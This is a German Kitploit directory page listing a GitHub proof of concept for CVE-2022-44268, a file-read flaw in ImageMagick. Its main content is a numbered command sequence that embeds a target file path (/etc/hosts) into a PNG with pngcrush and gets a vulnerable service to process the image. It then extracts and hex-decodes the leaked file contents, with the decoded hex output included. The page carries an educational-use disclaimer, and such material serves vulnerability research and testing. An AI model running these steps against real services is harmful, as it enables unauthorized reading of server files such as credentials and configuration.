Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC — CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator | Kitploit
Tools/GitHubGitHub/duc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubduc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc

CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
27537vor 3 JahrenVon Kitploit geprüft

CVE-2022-44268 ImageMagick PoC zum Auslesen beliebiger Dateien

PoC für CVE-2022-44268 ImageMagick PoC zum Auslesen beliebiger Dateien - Payload-Generator

Dieses Projekt wurde nur zu Bildungszwecken erstellt und darf nicht für Gesetzesverstöße oder persönlichen Gewinn genutzt werden.

Der Autor dieses Projekts übernimmt keine Verantwortung für mögliche Schäden, die durch die Materialien dieses Projekts verursacht werden.

Ursprüngliche Entdeckung: https://www.metabaseq.com/imagemagick-zero-days/

Verwendung:

Abhängigkeiten installieren:

1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

Ändern Sie den Dateinamen, den Sie lesen möchten, unten:

2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

Bestätigen, dass alles einwandfrei funktioniert hat

3. $ exiv2 -pS pngout.png

Lösen Sie das PoC über convert aus oder laden Sie das Bild auf den anfälligen Dienst hoch:

4. $ convert pngout.png gopro.png

Inhalt der gelesenen Datei anzeigen:

5. $ identify -verbose gopro.png

Inhalt entschlüsseln:

6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

Demo

Getestet mit Ubuntu 22.04 und standardmäßig installiertem ImageMagick.

Tool herunterladen